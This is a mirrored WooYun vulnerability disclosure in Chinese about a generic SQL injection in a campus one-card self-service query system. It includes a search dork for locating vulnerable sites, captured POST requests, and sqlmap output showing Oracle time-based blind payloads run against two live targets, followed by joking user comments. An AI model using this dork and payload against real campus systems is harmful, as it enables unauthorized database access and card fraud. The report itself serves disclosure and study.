某校园一卡通平台通用型SQL注入漏洞(终结篇)

2015年6月29日01:35:33评论497 views字数 239阅读0分47秒阅读模式

摘要

2014-10-02：细节已通知厂商并且等待厂商处理中
2014-10-05：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-11-29：细节向核心白帽子及相关领域专家公开
2014-12-09：细节向普通白帽子公开
2014-12-19：细节向实习白帽子公开
2014-12-26：细节向公众公开

漏洞概要关注数(25) 关注此漏洞

缺陷编号： WooYun-2014-77883

漏洞标题：某校园一卡通平台通用型SQL注入漏洞(终结篇)

漏洞作者：路人甲

提交时间： 2014-10-02 11:33

公开时间： 2014-12-26 11:34

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

3人收藏

漏洞详情

披露状态：

简要描述：

...

详细说明：

百度dork：一卡通自助查询管理系统--首页

漏洞页面：UserLogin.aspx(用户登录框)

漏洞参数：txtUserName

网站架构：Aspx + Oracle

code 区域

收集案例： 
 http://**.**.**.**/ 
 http://**.**.**.**/ 
 http://**.**.**.**/ 
 **.**.**.**/SelfSearch/Default.aspx 
 **.**.**.**/SelfSearch/ 
 http://**.**.**.**/SelfSearch/ 
 http://**.**.**.**/default.aspx 
 http://**.**.**.**/selfsearch/ 
 **.**.**.**/selfsearch/ 
 http://**.**.**.**:114/ 
 **.**.**.**/selfsearch/

<漏洞证明>

1# http://**.**.**.**

code 区域

测试数据
 POST /UserInfo/UserLogin.aspx HTTP/1.1
 Host: **.**.**.**
 Proxy-Connection: keep-alive
 Content-Length: 511
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Origin: http://**.**.**.**
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Referer: http://**.**.**.**/UserInfo/UserLogin.aspx
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
 Cookie: ASP.NET_SessionId=mczm4gqd5k5bqknbrab5phbc
 
 __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTczODI0OTkzNQ9kFgICAw9kFgQCAw8PFgIeB1Zpc2libGVnZBYCAgEPDxYCHgRUZXh0BQznlKjmiLflkI3vvJpkZAIFDw8WAh8AaGQWBAIBDw8WAh8BBQ3plJnor6%2Fljp%2Flm6A6ZGQCAw8PFgIfAQVC5p%2Bl6K%2Bi57uT5p6c5Li656m677yM6L6T5YWl55qE55So5oi35LiN5a2Y5Zyo5oiW5bey5oiQ5biQ5aSW5Y2h77yBZGRkBoGAKLFhS9bp5K80l7EDTTWuKi4%3D&__EVENTVALIDATION=%2FwEWBgKwwJj9CQKl1bKzCQKd%2B7qdDgKY2YWXBgKTgvWHDQLJk9%2FkDImwNsGU0pQlSSMzEwopYl%2FPMVGy&txtUserName=*&txtPwd=123123&txtCheckCode=6174&btnUserLogin=

code 区域

测试结果
 sqlmap identified the following injection points with a total of 0 HTTP(s) reque
 sts:
 ---
 Place: (custom) POST
 Parameter: #1*
     Type: AND/OR time-based blind
     Title: Oracle AND time-based blind (comment)
     Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTczODI0OTkzNQ9
 kFgICAw9kFgQCAw8PFgIeB1Zpc2libGVnZBYCAgEPDxYCHgRUZXh0BQznlKjmiLflkI3vvJpkZAIFDw8
 WAh8AaGQWBAIBDw8WAh8BBQ3plJnor6/ljp/lm6A6ZGQCAw8PFgIfAQVC5p+l6K+i57uT5p6c5Li656m
 677yM6L6T5YWl55qE55So5oi35LiN5a2Y5Zyo5oiW5bey5oiQ5biQ5aSW5Y2h77yBZGRkBoGAKLFhS9b
 p5K80l7EDTTWuKi4=&__EVENTVALIDATION=/wEWBgKwwJj9CQKl1bKzCQKd+7qdDgKY2YWXBgKTgvWH
 DQLJk9/kDImwNsGU0pQlSSMzEwopYl/PMVGy&txtUserName=%' AND 6545=DBMS_PIPE.RECEIVE_M
 ESSAGE(CHR(106)||CHR(109)||CHR(118)||CHR(84),5)--&txtPwd=123123&txtCheckCode=617
 4&btnUserLogin=
 ---
 [09:35:55] [INFO] the back-end DBMS is Oracle
 web server operating system: Windows 2008 R2 or 7
 web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
 back-end DBMS: Oracle
 [09:35:55] [INFO] fetching current database
 [09:35:55] [WARNING] time-based comparison requires larger statistical model, pl
 ease wait..............................
 do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
 '--time-sec')? [Y/n]
 [09:36:11] [WARNING] it is very important not to stress the network adapter duri
 ng usage of time-based payloads to prevent potential errors
 C
 [09:36:24] [INFO] adjusting time delay to 1 second due to good response times
 CENSE
 [09:36:52] [WARNING] on Oracle you'll need to use schema names for enumeration a
 s the counterpart to database names on other DBMSes
 current schema (equivalent to database on Oracle):    'CCENSE'
 [09:36:52] [INFO] fetched data logged to text files under 'C:/Users/Administrato
 r/.sqlmap/output/**.**.**.**'
 
 [*] shutting down at 09:36:52

2# http://**.**.**.**:114/

code 区域

测试数据
 POST /UserInfo/UserLogin.aspx HTTP/1.1
 Host: **.**.**.**:114
 Proxy-Connection: keep-alive
 Content-Length: 335
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Origin: http://**.**.**.**:114
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Referer: http://**.**.**.**:114/UserInfo/UserLogin.aspx
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
 Cookie: ASP.NET_SessionId=wsjzdsiykimw1w55yaq4oy55
 
 __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTUwNTExNDEzMg9kFgICAw9kFgICAQ9kFgICAQ8PFgIeBFRleHQFDOeUqOaIt%2BWQje%2B8mmRkZM%2BiPW9TLYnRwd1iqTJB7MVAWXC%2B&txtUserName=*&txtPwd=admin&txtCheckCode=7687&btnUserLogin=&__EVENTVALIDATION=%2FwEWBgLp%2F6GKAQKl1bKzCQKd%2B7qdDgKY2YWXBgKTgvWHDQLJk9%2FkDPlibsNXwBfNBpqqwnX79i55Bk1M

code 区域

测试结果
 sqlmap identified the following injection points with a total of 0 HTTP(s) reque
 sts:
 ---
 Place: (custom) POST
 Parameter: #1*
     Type: AND/OR time-based blind
     Title: Oracle AND time-based blind (comment)
     Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTUwNTExNDEzMg9
 kFgICAw9kFgICAQ9kFgICAQ8PFgIeBFRleHQFDOeUqOaIt+WQje+8mmRkZM+iPW9TLYnRwd1iqTJB7MV
 AWXC+&txtUserName=%' AND 1858=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(116)||CHR(
 69)||CHR(87),5)--&txtPwd=admin&txtCheckCode=7687&btnUserLogin=&__EVENTVALIDATION
 =/wEWBgLp/6GKAQKl1bKzCQKd+7qdDgKY2YWXBgKTgvWHDQLJk9/kDPlibsNXwBfNBpqqwnX79i55Bk1
 M
 ---
 [09:46:39] [INFO] the back-end DBMS is Oracle
 web server operating system: Windows 2003 or XP
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
 back-end DBMS: Oracle
 [09:46:40] [INFO] fetching current database
 [09:46:40] [WARNING] time-based comparison requires larger statistical model, pl
 ease wait..............................
 do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
 '--time-sec')? [Y/n]
 [09:47:00] [WARNING] it is very important not to stress the network adapter duri
 ng usage of time-based payloads to prevent potential errors
 [09:47:09] [INFO] adjusting time delay to 2 seconds due to good response times
 [09:47:09] [ERROR] invalid character detected. retrying..
 [09:47:09] [WARNING] increasing time delay to 3 seconds
 [09:47:18] [ERROR] invalid character detected. retrying..
 [09:47:18] [WARNING] increasing time delay to 4 seconds
 CCENSE
 [09:48:42] [WARNING] on Oracle you'll need to use schema names for enumeration a
 s the counterpart to database names on other DBMSes
 current schema (equivalent to database on Oracle):    'CCENSE'
 [09:48:42] [INFO] fetched data logged to text files under 'C:/Users/Administrato
 r/.sqlmap/output/**.**.**.**'
 
 [*] shutting down at 09:48:42

漏洞证明：

...

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-12-26 11:34

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-09-30 12:38 | 吹皱一池春水 ( 路人 | Rank:2 漏洞数:2 | 岁月是把杀猪刀)

0

拿下一卡通，从此吃饭不再愁

1# 回复此人
2014-09-30 13:30 | dgdg ( 路人 | Rank:9 漏洞数:5 | 乌云币:10000)

6

@吹皱一池春水是的因为去吃牢饭了。。。。

2# 回复此人
2014-09-30 13:37 | 魇 ( 普通白帽子 | Rank:1218 漏洞数:107 | 传闻中魇是一个惊世奇男子，但是除了他华...)

0

@dgdg 神回复

3# 回复此人
2014-09-30 16:19 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安，不只保险这么简单。)

1

@dgdg 精辟

4# 回复此人
2014-10-07 12:44 | 路西法 ( 路人 | Rank:2 漏洞数:2 | 堕落天使路西法)

0

@吹皱一池春水服务器都有记录的，财务一对就知道了，这个真心只能娱乐。

5# 回复此人
2014-10-08 17:05 | 破锁 ( 路人 | Rank:23 漏洞数:6 )

0

要不先给我冲个5000，这学期咱不充钱了，刚好卡里就剩15块钱得冲饭卡了

6# 回复此人
2014-10-09 20:28 | 大漠長河 ( 实习白帽子 | Rank:66 漏洞数:10 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区枫叶正...)

0

@dgdg 经典呀经典看我签名

7# 回复此人
2014-10-11 10:25 | 丸子哥 ( 路人 | Rank:0 漏洞数:1 | 我是来膜拜大家的)

0

@dgdg 亮了

8# 回复此人
2014-12-26 13:58 | 天明 ( 实习白帽子 | Rank:59 漏洞数:17 | 我要为大叔报仇。)

1

我擦，，我昨天发现一个提交360了。。。

9# 回复此人

漏洞概要 关注数(25) 关注此漏洞

缺陷编号： WooYun-2014-77883

漏洞标题： 某校园一卡通平台通用型SQL注入漏洞(终结篇)

相关厂商： cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间： 2014-10-02 11:33

公开时间： 2014-12-26 11:34

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

3人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(25) 关注此漏洞

漏洞标题：某校园一卡通平台通用型SQL注入漏洞(终结篇)

漏洞作者：路人甲

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：无

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分